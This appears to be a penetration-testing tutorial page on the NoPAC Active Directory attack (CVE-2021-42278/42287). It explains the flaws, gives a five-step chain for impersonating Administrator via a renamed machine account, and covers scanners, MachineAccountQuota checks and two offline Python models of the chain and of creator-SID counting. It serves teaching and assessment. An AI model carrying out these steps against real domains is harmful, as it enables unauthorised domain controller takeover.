NoPAC
The NoPAC attack is a chained exploitation technique that combines two vulnerabilities: sAMAccountName spoofing, a privilege escalation based on renaming an account, and a flaw in how the Key Distribution Center (KDC) resolves account names.
The first vulnerability, sAMAccountName spoofing (CVE-2021-42278), relies on the attacker having permission to modify the sAMAccountName attribute of, typically, a machine account. Before the fix, the DC did not enforce that a computer account's sAMAccountName keeps its trailing $, so the attacker can rename the account to match the name of a Domain Controller (DC) without the $. For example, from DC01$ to DC01.
The second vulnerability, NoPAC (CVE-2021-42287), exists in the KDC. When the KDC processes a service ticket (TGS) request and the client name carried in the TGT no longer exists in the directory, it appends a $ to the name and looks it up again. If the attacker's account has meanwhile been renamed back, that retry resolves to the legitimate machine account of the DC, and the KDC treats the request as coming from the DC itself.
A system vulnerable to NoPAC is not necessarily vulnerable to sAMAccountName spoofing. Both conditions must be present for the full attack chain to succeed.
A key component in this process is the Privilege Attribute Certificate (PAC). The PAC contains critical information about the authenticated user, including:
The user’s Security Identifier (SID)
Group SIDs
User rights and privileges
Logon information
When a user requests a TGT, the KDC embeds the PAC in the ticket, and services later rely on it to make authorization decisions. A DC with the November 2021 updates includes the PAC in every ticket regardless of what the client asks for, so a TGT that comes back without a PAC shows that the DC has not received the fix. That is the indicator the scanners below rely on; on such a DC the rest of the chain can be used to obtain a service ticket for a privileged user.
Attack
The NoPAC attack typically proceeds through the following steps:
1. Create a new computer account (e.g., TEST01) and remove the automatically created Service Principal Names (SPNs). In some cases, an existing machine account or a user account can also be used.
2. Modify the sAMAccountName of the computer account so that it matches the DC name, but without the trailing $.
3. Request a TGT using the credentials of the modified machine account.
4. Restore the original sAMAccountName value.
5. Use S4U2Self to request a TGS that impersonates a privileged user such as Administrator.
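The five steps above, played through a toy model of the directory and the KDC name lookups. This is an added example, not code from the original page or from any of the tools it mentions, and it is not a Kerberos implementation: there is no ASN.1, no encryption and no real PAC. The account names, SIDs and the "patched" behaviours are constructed for the demonstration; the two fixes are modelled as they have been described publicly (computer sAMAccountNames set by non-admins must end in $, and S4U2Self checks the TGT owner by the SID recorded at AS-REQ time rather than by name), and each can be switched on separately so the point made earlier, that both conditions must hold for the chain to succeed, can be seen directly.

```python
"""Toy model of the NoPAC chain (CVE-2021-42278 + CVE-2021-42287).

Added example, not code from the page or any real tool. Names, SIDs and the
modelled fixes are assumptions for the demonstration.
"""
from dataclasses import dataclass, field


class DirectoryError(Exception):
    """Raised where a real DC/KDC would return an error."""


@dataclass
class Account:
    sam: str                 # sAMAccountName
    sid: str                 # objectSid, never changes on rename
    is_computer: bool
    spns: list = field(default_factory=list)


@dataclass
class TGT:
    cname: str               # client name as it was at AS-REQ time
    requestor_sid: str       # what PAC_REQUESTOR carries on a patched DC


class Directory:
    def __init__(self, sam_check: bool):
        self.sam_check = sam_check          # CVE-2021-42278 fix present?
        self.accounts: dict[str, Account] = {}

    def add(self, acct: Account) -> None:
        if acct.sam in self.accounts:
            raise DirectoryError("duplicate sAMAccountName")
        self.accounts[acct.sam] = acct

    def rename(self, old: str, new: str, by_admin: bool = False) -> None:
        acct = self.accounts[old]
        if new in self.accounts:
            raise DirectoryError("duplicate sAMAccountName")
        # Modelled fix: a non-admin cannot strip the trailing '$' from a computer
        if self.sam_check and acct.is_computer and not by_admin and not new.endswith("$"):
            raise DirectoryError("computer sAMAccountName must end with '$'")
        del self.accounts[old]
        acct.sam = new
        self.accounts[new] = acct


class KDC:
    def __init__(self, directory: Directory, pac_requestor: bool):
        self.dir = directory
        self.pac_requestor = pac_requestor  # CVE-2021-42287 fix present?

    def as_req(self, sam: str) -> TGT:
        acct = self.dir.accounts[sam]
        return TGT(cname=sam, requestor_sid=acct.sid)

    def _resolve_client(self, tgt: TGT) -> Account:
        accounts = self.dir.accounts
        if tgt.cname in accounts:
            acct = accounts[tgt.cname]
        elif tgt.cname + "$" in accounts:   # the silent retry with '$' appended
            acct = accounts[tgt.cname + "$"]
        else:
            raise DirectoryError("client not found")
        # Modelled fix: the name must still belong to the SID that got the TGT
        if self.pac_requestor and acct.sid != tgt.requestor_sid:
            raise DirectoryError("PAC_REQUESTOR SID does not match account")
        return acct

    def s4u2self(self, tgt: TGT, impersonate: str) -> dict:
        acct = self._resolve_client(tgt)
        return {"service": acct.sam, "client": impersonate}


def nopac_chain(sam_check: bool, pac_requestor: bool) -> str:
    """Run steps 1-5 against a DC with the given fixes; return the outcome."""
    d = Directory(sam_check)
    d.add(Account("DC01$", "S-1-5-21-1-1-1-1000", True, ["HOST/DC01"]))
    d.add(Account("Administrator", "S-1-5-21-1-1-1-500", False))
    kdc = KDC(d, pac_requestor)
    # Step 1: attacker creates TEST01$ under MAQ and clears its SPNs
    d.add(Account("TEST01$", "S-1-5-21-1-1-1-1105", True, ["HOST/TEST01"]))
    d.accounts["TEST01$"].spns.clear()
    try:
        d.rename("TEST01$", "DC01")                   # Step 2: spoof the DC name
        tgt = kdc.as_req("DC01")                      # Step 3: TGT as "DC01"
        d.rename("DC01", "TEST01$")                   # Step 4: restore the name
        ticket = kdc.s4u2self(tgt, "Administrator")   # Step 5: S4U2Self
    except DirectoryError as exc:
        return f"blocked: {exc}"
    return f"{ticket['client']} to {ticket['service']}"
```

Only `nopac_chain(False, False)` ends with a ticket for Administrator to DC01$; with either fix switched on the chain is rejected at step 2 or step 5.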
Windows
The noPac binary can be used to determine whether a DC is vulnerable to the NoPAC attack. Its scan requests a TGT with the PAC explicitly not requested. If the DC honours that and returns a PAC-less ticket, the ticket is typically smaller than 1000 bytes, which the tool treats as an indication that the DC is unpatched.
Next, the MachineAccountQuota (MAQ) value should be checked. By default (ms-DS-MachineAccountQuota = 10), a standard domain user can join up to 10 machines to the domain. Computer objects created under this quota record the creator in the ms-DS-CreatorSID attribute, so querying that attribute on computer objects shows how many machine accounts a specific user has already created.
Even if MAQ is set to its default value, Access Control Lists (ACLs) on the container where computer objects are created may still prevent a user from creating new machine accounts.
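The MAQ check above in code: ms-DS-CreatorSID is stored as a binary SID, so it has to be decoded before it can be matched to a user. This is an added example, not code from the page or from any tool it mentions. The computer objects and the domain SID are constructed inline so the block runs offline; in practice they would come from an LDAP search for computer objects returning sAMAccountName and ms-DS-CreatorSID, and the quota from the domain object's ms-DS-MachineAccountQuota. Objects created by an administrator with Create-Child rights have no ms-DS-CreatorSID, which the model reflects.

```python
"""Decode ms-DS-CreatorSID and count machine accounts per creator against MAQ.

Added example, not code from the page. Directory entries and SIDs below are
constructed; real data would come from LDAP.
"""
import struct
from collections import Counter


def sid_to_string(raw: bytes) -> str:
    """Decode a binary SID: revision, sub-authority count, 48-bit big-endian
    identifier authority, then little-endian 32-bit sub-authorities."""
    if len(raw) < 8:
        raise ValueError("SID too short")
    revision, count = raw[0], raw[1]
    if len(raw) != 8 + 4 * count:
        raise ValueError("SID length does not match sub-authority count")
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, raw, 8)
    return "S-%d-%d%s" % (revision, authority, "".join("-%d" % s for s in subs))


def string_to_sid(text: str) -> bytes:
    """Inverse of sid_to_string; used here to build the constructed entries."""
    parts = text.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError("not a SID string")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"   # constructed domain SID
MAQ = 10                                               # default ms-DS-MachineAccountQuota

# Constructed computer objects. DC01$ was created by an administrator, so it
# carries no ms-DS-CreatorSID; the others were created under the quota.
COMPUTERS = [
    {"sAMAccountName": "DC01$", "ms-DS-CreatorSID": None},
    {"sAMAccountName": "WS01$", "ms-DS-CreatorSID": string_to_sid(DOMAIN + "-1105")},
    {"sAMAccountName": "WS02$", "ms-DS-CreatorSID": string_to_sid(DOMAIN + "-1105")},
    {"sAMAccountName": "WS03$", "ms-DS-CreatorSID": string_to_sid(DOMAIN + "-1105")},
    {"sAMAccountName": "LAB01$", "ms-DS-CreatorSID": string_to_sid(DOMAIN + "-1106")},
]


def creators(computers: list) -> dict:
    """Map creator SID string -> number of computer objects it created."""
    counts = Counter()
    for obj in computers:
        raw = obj.get("ms-DS-CreatorSID")
        if raw:
            counts[sid_to_string(raw)] += 1
    return dict(counts)


def remaining_quota(creator_sid: str, computers: list, maq: int = MAQ) -> int:
    """Machine accounts this user can still add under MAQ (0 when exhausted)."""
    used = creators(computers).get(creator_sid, 0)
    return max(maq - used, 0)


if __name__ == "__main__":
    for sid, n in creators(COMPUTERS).items():
        print(f"{sid}: {n} created, {remaining_quota(sid, COMPUTERS)} remaining")
```

A creator who has already used all ten slots gets 0 back, which is the case where an existing machine account or a user account (see below) has to be used instead.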
Linux
In addition to machine accounts, the attack can also be performed with a user account. For example, if user x7331 has GenericAll permissions over another user (e.g., bob), bob's sAMAccountName can be modified and the chain carried out through that account instead. In this scenario, the target user must have no SPNs set.
On Linux systems, the NoPAC scanner can be used to determine whether a DC is vulnerable.